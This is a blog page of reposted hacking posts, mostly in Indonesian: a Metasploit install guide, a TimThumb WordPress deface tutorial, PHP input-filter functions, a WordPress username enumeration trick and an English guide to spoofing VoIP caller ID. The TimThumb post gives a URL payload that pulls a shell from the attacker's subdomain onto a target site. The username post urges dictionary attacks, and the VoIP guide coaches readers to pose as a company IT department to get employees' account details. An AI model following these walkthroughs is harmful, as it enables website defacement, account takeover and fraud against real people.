Showing posts with label Security. Show all posts
Cara Menginstall Metasploit Di Linux
Toturial kali ini adalah Cara Menginstall Metasploit Di Linux tapi sebelum kita memasuki langkah-langkah dari toturial ini alangkah lebih baiknya kita mengetahui apa itu metasploit
Metasploit merupakan sofware security yang sering digunakan untuk menguji coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu sistem.
Metasploit diciptakan oleh HD Moore pada tahun 2003 sebagai sebuah alat jaringan portabel menggunakan bahasa scripting Perl. Kemudian, Metasploit Framework benar-benar ditulis ulang dalam bahasa pemrograman Ruby. Pada tanggal 21 Oktober 2009, Proyek Metasploit mengumumkan yang telah diakuisisi oleh Rapid7, sebuah perusahaan keamanan yang menyediakan solusi kerentanan manajemen terpadu.
Seperti produk komersial yang sebanding seperti kanvas Imunitas atau Inti Dampak Core Security Technologies, Metasploit dapat digunakan untuk menguji kerentanan sistem komputer untuk melindungi mereka atau untuk masuk ke sistem remote. Seperti alat-alat keamanan banyak informasi, Metasploit dapat digunakan untuk kegiatan baik yang sah dan tidak sah. Sejak akuisisi dari Metasploit Framework.
Sudah mengerti bukan apa itu Metasploit ? sekarang mari kita memasuki tahap penginstallan dari aplikasi ini.
1. Download Metasploit.
Download Metasploit
Download Metasploit
2. Rubah permission atau izin menjadi rwxr-xr-x
chmod +x metasploit.run
3. Eksekusi metasploit.run
./metasploit.run
Setelah langkah ke-3 sudah dilakukan ama form wizard seperti gambar dibawah akan muncul.
Klik Forward untuk kelangkah selanjutnya.
Klik Radio Button I accept the agreement, kemudian klik tombol Forward.
Masukan /opt/metasploit pada input text untuk folder instalasi Metasploit.
Klik Radio Button Yes apabila anda ingin Service Metasploit diaktifkan ketika OS anda dihidupkan, apabila tidak ingin aktif otomatis silahkan klik No kemudian klik tombol forward.
Masukan SSL Port menjadi 3790 kemudian klik tombol Forward.
Pada Server Name masukan “localhost” dan Days of validity isi menjadi 3650 dan centang tulisan Yes, trus certificate kemudian klik tombol Forward.
Kemudian tunggu sampai selesai proses penginstallannya.
Nah apabila sudah selesai maka Metasploit siap untuk anda gunakan .
Demikian toturial singkat dari M-Supian.ID bagaimana cara menginstall Metasploit di OS Linux anda. Apabila ada kesalahan dalam toturial ini atau ada yang ingin ditanyakan silahkan beri komentar dibawah ini.
Tutorial Deface Dengan TimThumb 1.14
Okeh sebelum belajar exploit ini saya mau ngejelasin bahwa timthumb ini adalah suatu bug dimana terdapat di semua website wordpress , lebih tepatnya terdapat pada " theme / tema " suatu website ,,,
Contoh : themes/optimizepress/timthumb.php < nah kalo ada bacaan seperti "
Contoh : themes/optimizepress/timthumb.php < nah kalo ada bacaan seperti "
no image specified
Query String :
TimThumb version : 1.19
berarti vuln ;) ,, nah yang harus kamu ketahui lagi itu adalah TimThumb version .
Nah jadi target yang bisa kita exploitasi itu timthumb version 1.14 sampai dengan
1.32 ,, Udah ngerti kan ? :) kalo belum ngerti liat aja tutorialnya :) ,, Yuk TKP ..
Alat dan Bahan :
1. Subdomain yang terintegrasi website berikut
: picasa.com
: blogger.com
: flixr.com
sebenarnya ada 5 tapi aku gk hafal U,u ,, contoh " flxr.com.namawebsitekamu.com/shell.php "
, Nah sebelumnya kamu musti upload dulu shell di subdomain kamu yang letaknya di directory
public_html / httpdocs / www / dan macam² ..
2. Otak dan pantang menyerah ;) ..
Exploit :
1. Kali ini saya dah punya target sendiri ,, lihat gambar ..
2. Nah kemudian kalian tambahkan subdomain kalian di ahkir url seperti ini " ?src=http://www.flixr.com.subdomainkamu.com/shell.php " < begitu mas ;) ,, kurang jelas ? lihat gambar ..
3. Tuh liat gambarnya kalo gitu dah " Game Over " namanya ;) .. tinggal buka shellnya aja kan di situ ada tulisan " Unable to open image :" kalo gitu skrng tinggal buka shellnya , caranya copy md5 yang tadi contoh :" /cache/c89de71219ef668b7642e43e04d5d4df.php " masih kurang jelas ? liat gambar ..
4. Nah skrng kita copas ke urlnya jadi " http://namatarget.com/wp-content/themes/optimizepress/cache/c89de71219ef668b7642e43e04d5d4df.php " , lihat di bawah ,,5. Selesai deh :D ,,, nah itu kalo ane gk upload shell di subdomainnya tapi upload uploader aja jadi ky gitu ,,
hehe sory yak uploadernya punya pak deb~X ,,
Source : Extreme Crew
post diambil dari SINI
Cara menutup celah XSS dan SQL
Seperti yang kita ketahui bahwa bug SQL dan XSS sangat banyak , sampai saat ini pun masih banyak situs-situs yg mempunyai bug sql dan xss , itu semua karena developers yang malas untuk masalah keamanan dalam website.
Kali ini saya akan sharing cara menutup celah xss dan sql , tujuan postingan kali ini agar yang baru belajar CRUD bisa membiasakan diri untuk menutup sebuah bug sql dan xss.
penutupan celah xss dan sql ini sudah saya terapkan di situs saya pribadi , namun saya masih was-was juga karena semakin hari dan semakin lama dan semakin lampau pasti akan ada yang bisa bypass.
di atas adalah cara untuk menutup sebuah bug xss , nah kalau binggung cara meletakanya gimana nnti saya akan jelaskan di bawah.
di atas adalah cara untuk menutup sebuah bug sql.
nah di atas adalah OOP , jadi kalau mau di terapin di php biasa kalian cuman ambil fungsi di dalam public
semoga bermanfaat dan bila ada yang bingung , silahkan di tanyakan.
Sumber : Post diambil dari Forum IndoXploit yang post oleh Logika Galau
Kali ini saya akan sharing cara menutup celah xss dan sql , tujuan postingan kali ini agar yang baru belajar CRUD bisa membiasakan diri untuk menutup sebuah bug sql dan xss.
penutupan celah xss dan sql ini sudah saya terapkan di situs saya pribadi , namun saya masih was-was juga karena semakin hari dan semakin lama dan semakin lampau pasti akan ada yang bisa bypass.
PHP Code:
public function anti_xss($data){
//$data = htmlspecialchars($data);
$data = htmlentities($data);
$data = strip_tags($data);
$data = filter_var($data, FILTER_SANITIZE_STRING);
return $data;
}
di atas adalah cara untuk menutup sebuah bug xss , nah kalau binggung cara meletakanya gimana nnti saya akan jelaskan di bawah.
PHP Code:
public function anti_sql($id){
$id = is_numeric(htmlspecialchars($id));
if($id){
return true;
}else{
return false;
}
}
nah di atas adalah OOP , jadi kalau mau di terapin di php biasa kalian cuman ambil fungsi di dalam public
semoga bermanfaat dan bila ada yang bingung , silahkan di tanyakan.
Sumber : Post diambil dari Forum IndoXploit yang post oleh Logika Galau
Cara Mengetahui Username Pada Wordpress [ Cocok Untuk Yang Hobi BF ]
kali ini ane pengen share cara mengetahui username pada wordpress.
ane sendiri juga baru tau setelah kemarin ngubek ngubek WPScan.
cukup simple sih.
cuma menambahkan ?author=id
nanti akan muncul username + namenya.
pada kali ini cuma menampilkan username + name dari id 1-10.
kalo mau sampe 20, ubah aja $id yang didalem for.
POC:
jadi ini cuma menampilkan id yg ada username + namenya aja.
setelah mengetahui usernamenya, silahkan di dictionary attack.
#KeepShare.
ane sendiri juga baru tau setelah kemarin ngubek ngubek WPScan.
cukup simple sih.
cuma menambahkan ?author=id
nanti akan muncul username + namenya.
pada kali ini cuma menampilkan username + name dari id 1-10.
kalo mau sampe 20, ubah aja $id yang didalem for.
POC:
jadi ini cuma menampilkan id yg ada username + namenya aja.
setelah mengetahui usernamenya, silahkan di dictionary attack.
script:
http://pastebin.com/AqCmhr2Y
#KeepShare.
Post Copied From INDOEXPLOIT
Learn How Elliot from Mr. Robot Hacked into His Therapist's New Boyfriend's Email & Bank Accounts (Using Metasploit)
Social engineering is a pretty important item in a hacker's toolkit.
In Mr robot there was a time, we saw Elliot using social engineering to gain access to his therapist's boyfriend's email and bank accounts by calling him and pretending to be someone from his bank, then Elliot asked him for some info that were really useful to gain access to his account, the target believed to be someone from the bank and gave him the info Elliot was looking for.
But How Is It in the Real World?
Gathering information about a target remotely is easy, but learning about the person behind the screen is important too. You can't always gather that information by just googling or using website offering info about people or institutions, sometimes you have to get this info directly from the user,in the real world, Bazzell said, most breaches we hear about start with social engineering. He said they usually occur through a malicious email or by tricking an employee, so this is what are we going to learn today.
What Are We Going to Do?
Today i'm going to show you how you can trick an employee to give you all the info to successfully hack the company, using metasploit and softphone.
Introduction about SIP and voip
Due to its increasing reliability and accessibility, in recent years, internet telephony technology has become a plausible choice for many businesses, allowing them to cut down on their communication costs whilst enjoying a rich communication experience.
SIP and VoIP provide the foundations for IP technology. Both technologies provide ample benefits and opportunities for the user to save money whilst increasing their productivity. Each protocol has pros and cons, and they are often used together.
All of us were already at least once in life been in an office, and we noticed the presence of one or more landline telephones, mainly in the area of customer service, but these days most companies no longer use those landline telephones, instead companies have adapted the use of ip phones (SIP,VOIP), which are sometimes free(SKYPE) and can be accessed anywhere in the world , all you need is the public SIP address that follows you much like your email address would. It doesn't really matter where you are or what device you use; as long as you're logged in (registered), SIP communications will be redirected to your current location.
Session Initiation Protocol, (SIP), is a powerful and efficient communications protocol which can be used to send multimedia messages to multiple parties - allowing people around the world to communicate over the internet using their computers and mobile devices
Voice over IP (VoIP) is a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet.
For more info about these protocols you can google it in case you don't understand them.
REAL WORLD EXAMPLE
For this example we are going to use google as target company, but you could change google to the name or domain of your target company or entity, Softphone as our voip phone also called ip phone, and metasploit to create a fake SIP invite request making the targeted device ring and display fake caller id information, because in the real world users would believe only trusted caller(But for some people you dont even need all this process).
Before we start a softphone is a software program for making telephone calls over the Internet using a general purpose computer, rather than using dedicated hardware. The softphone can also be installed on a piece of equipment such as a workstation, portable computer, tablet or even a cellphone and allows the user to place and receive calls without requiring an actual telephone set, at its available for linux too, enough theory for today fire up your kali linux and download softphone
apt-get install sflphone-gnome
As you can see from the below pic, i have already downloaded the softphone, skip it in case you have it too.
As you can see from the below pic, i have already downloaded the softphone, skip it in case you have it too.
Once yo done downloading you can access the softphone by navigating through applications--->usual applications--->internet and you will see the softphone installed there, just click on the icon to open it(lol i bet you already know how to open programs).
When you open it for the first time, you will be prompted with a screen like the one below, for now just set everything as below and click next
Now when you get the phone on your screen go to edit-->accounts---> and choose "ip2ip" click on edit and choose advanced
On network interface choose your network interface and leave the port as default, in my case i'm using eth0 as interface, you can choose any.
For now we are done configuring our ip phone.
The Hack
We will be using metasploit to hack our softphone, this is intended for users that knows how to use metsploit.
The module we will use will create a fake SIP invite request making the targeted device ring and display fake caller id information.
The commands:
msfconsole
use auxiliary/voip/sip_invite_spoof
msfconsole
use auxiliary/voip/sip_invite_spoof
To see the options(please don't copy it, its not a command simply to economize time)
Understanding the Module
The DOMAIN is the sip domain, in our case as we will be working locally, we can just skip it, it could be something like google, wonderhowto or any other as long they have a sip domain.
The EXTENSION is the target identity inside the network, record for SIP does the same thing as a mail exchange record for email,lets say the sip domain is google, the extension of a target could be something like voice.john@google.com
The MSG is the spoofed caller id to send in our case we will pretend we are from the it department of google
The RHOSTS is the target ip, in my case my softphone is installed in my localhost with the ip 192.168.0.101
The SRCADDR is the spoof call sip address, in our case it will be voice.admin@google.com, to make the target(employee fro google in our case) thinking that its coming from google it department.
When we run it we will receive a call apparently coming from google it department, but it was just a spoofed identity as we can see from the below pic.
Of course its rare for you to get it working on google, but if you can try in some other companies or entities, all you need is just their voip ip address or you can just be in the same network and scan for ip with the following open ports : 5060, 5070, 10000-65535 default ports for a lot of voip services.
You can see that our softphone use the port 5060
Another thing you could do as well is to send an invitation over all the ip on the network, you just need to set the RHOSTS to a range of the ip on the target network in my case it could be
Once it finds an ip running sip on 5060 it then send an invitation as you can see from the above pic, this time we send an invitation over the network
What Now? How Can I Get Someones Email, or Bank Account Passwords with This?
Now its all about social engineering, once the user accepts the call use your best to trick him to give the info you are looking for.
In our example using google you could say that you are recently working on some new security app for google employees and would like to update employee's data, with more time you can figure out exactly what to say to gain access of their account, because they will think you are working in the it department of google, they might or not give you info, but its all about good talking.
Just like Elliot did, we could call to the target bank and pretend we are from It department and we would like to get some info about an user(our target) and so on...
Thats all for now, if i did mistake any thing or you would like to add your opinion, such as how you would trick the employee you are welcome...
see you soon and happy hacking...
Post Copied From Null Byte
Subscribe to:
Posts (Atom)